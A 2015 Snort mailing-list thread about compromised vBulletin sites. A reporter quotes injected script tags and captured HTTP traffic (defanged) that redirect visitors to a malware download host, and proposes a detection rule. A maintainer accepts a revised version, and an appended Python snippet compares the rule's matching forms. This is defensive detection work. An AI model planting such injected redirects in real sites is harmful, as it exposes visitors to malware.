[Snort-sigs] Compromised vBulletin sig

Matt Mickel mmickel at ...435...
Thu Apr 30 14:49:42 EDT 2015


Hi, James-

This rule has been reviewed and added to the community ruleset.  I 
removed the PCRE from the committed version and instead used the within 
content modifier.  This made the rule much more efficient while still 
detecting the relevant content.  Thanks so much for your submission.  
Cheers,

Matt Mickel

On 04/16/2015 01:30 PM, James Lay wrote:
> Didn't see this in any current ruleset, so I thought I'd post it here.
> Yesterday I saw two of these.  Injected into the vBulletin initial page:
>
> <script type="text/javascript"
> src="meow://meh[.]com/misc.php?v=364&js=js"></script>
> <script type="text/javascript"
> src="meow://bleh[.]com/forums/misc.php?v=420&js=js"></script>
>
>
> #######################################################################################
> GET /misc.php?v=364&js=js HTTP/1.1
> Accept: application/javascript, */*;q=0.8
> Referer:
> meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html
> Accept-Language: en-US
> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
> Trident/5.0)
> Accept-Encoding: gzip, deflate
> Host: meh.com
> Cookie: __cfduid=bleh; bbsessionhash=bleh; bblastvisit=1429113507;
> bblastactivity=0
> Cache-Control: max-stale=0
> Connection: Keep-Alive
> Pragma: no-cache
>
> HTTP/1.1 200 OK
> Date: Wed, 15 Apr 2015 15:58:25 GMT
> Content-Type: text/html; charset=ISO-8859-1
> Transfer-Encoding: chunked
> Connection: keep-alive
> Expires: 0
> Cache-Control: private, post-check=0, pre-check=0, max-age=0
> Pragma: no-cache
> Set-Cookie: bblastactivity=0; expires=Thu, 14-Apr-2016 15:58:27 GMT;
> path=/
> Set-Cookie: bblang_id=en; expires=Thu, 16-Apr-2015 01:58:27 GMT
> X-Powered-By: PleskLin
> Server: cloudflare-nginx
> CF-RAY: 1d78da121f59012e-SJC
> Content-Encoding: gzip
>
> document.location='meow://filestore72[.]info/download.php?id=f823cc00'
> #######################################################################################
>
> This in turn goes to:
>
> #######################################################################################
> GET /download.php?id=f823cc00 HTTP/1.1
> Accept: text/html, application/xhtml+xml, */*
> Referer:
> meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html
> Accept-Language: en-US
> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
> Trident/5.0)
> Accept-Encoding: gzip, deflate
> Host: filestore72[.]info
> Cache-Control: max-stale=0
> Connection: Keep-Alive
> Pragma: no-cache
>
> HTTP/1.1 302 Moved Temporarily
> Server: nginx/1.0.12
> Date: Wed, 15 Apr 2015 15:53:40 GMT
> Content-Type: text/html
> Content-Length: 161
> Connection: close
> Location:
> meow://pdta23sj9kkdl9wwtakzzhf.antalyagunlukkiralik[.]org/index.php?z=Z2xham91PWtuY2h2JnRpbWU9MTUwNDE1MTU0NTI1ODI3MDI4MSZzcmM9NzYmc3VybD1maWxlc3RvcmU3Mi5pbmZvJnNwb3J0PTgwJmtleT0yN0ExMzA0MSZzdXJpPS9kb3dubG9hZC5waHAlM2ZpZD1mODIzY2MwMA==
>
> <html>
> <head><title>302 Found</title></head>
> <body bgcolor="white">
> <center><h1>302 Found</h1></center>
> <hr><center>nginx/1.0.12</center>
> </body>
> </html>
> #######################################################################################
>
>
> Seems to be old-ish news, but the sig is below:
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS
> (msg:"SERVER-WEBAPP Compromised vbulletin site";
> flow:established,to_server; uricontent:"/misc.php?"; uricontent:"v=";
> uricontent:"js=js"; pcre:"/misc.php\x3Fv\x3D[0-9]{3}\x26js\x3Djs/Ui";
> reference:url,http://www.vbulletin.com/forum/forum/vbulletin-4/vbulletin-4-questions-problems-and-troubleshooting/4020207-please-help-hacked-vbulletin-redirect-to-filestore72-info;
> classtype:bad-unknown; sid:10000156; rev:1;)
>
> As usual, not sure if I have this perfect so anything to improve this
> sig would be excellent.  Thank you.
>
> James
>
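Added illustration, not the committed community rule and not code from either poster: the Python below emulates the two ways of expressing this match, the PCRE from James's sig and a content/distance/within form of the kind Matt describes, over constructed sample URIs. The exact Snort rule text (`distance:3; within:6;`) and the "first occurrence" matching simplification are my assumptions; the point it shows is that the within form drops the `[0-9]{3}` digit check, which is the caveat to weigh against the efficiency gain.

```python
import re

# Constructed sample request URIs (not taken from the thread) built around the
# pattern James reported: /misc.php?v=<3 digits>&js=js
SAMPLE_URIS = [
    "/misc.php?v=364&js=js",               # the reported shape
    "/forums/misc.php?v=420&js=js",        # same, with a path prefix
    "/misc.php?v=42&js=js",                # two digits: neither form matches
    "/misc.php?v=abc&js=js",               # non-digits: only the within form matches
    "/misc.php?v=364&do=whatever&js=js",   # extra parameter: neither form matches
]

# Emulates: pcre:"/misc.php\x3Fv\x3D[0-9]{3}\x26js\x3Djs/Ui" (U = URI buffer, i = nocase)
PCRE = re.compile(r"/misc\.php\?v=[0-9]{3}&js=js", re.IGNORECASE)

def pcre_match(uri: str) -> bool:
    return PCRE.search(uri) is not None

def content_within_match(uri: str) -> bool:
    """Emulates an assumed rewrite with relative content modifiers:
         content:"/misc.php?v="; http_uri; nocase;
         content:"&js=js"; distance:3; within:6; http_uri; nocase;
    distance:3 skips exactly three bytes after the first match, and within:6
    requires the six-byte second content to sit right there. Only the first
    occurrence of the first content is considered (simplification, assumed)."""
    u = uri.lower()
    first, second = "/misc.php?v=", "&js=js"
    i = u.find(first)
    if i < 0:
        return False
    end = i + len(first)
    window = u[end + 3 : end + 3 + len(second)]
    return window == second

def disagreements(uris):
    """URIs where the two forms differ: these are the cases the digit check
    in the PCRE was excluding and the within form lets through."""
    return [u for u in uris if pcre_match(u) != content_within_match(u)]

if __name__ == "__main__":
    for u in SAMPLE_URIS:
        print(f"{u:40} pcre={pcre_match(u)!s:5} within={content_within_match(u)}")
    print("differ:", disagreements(SAMPLE_URIS))
```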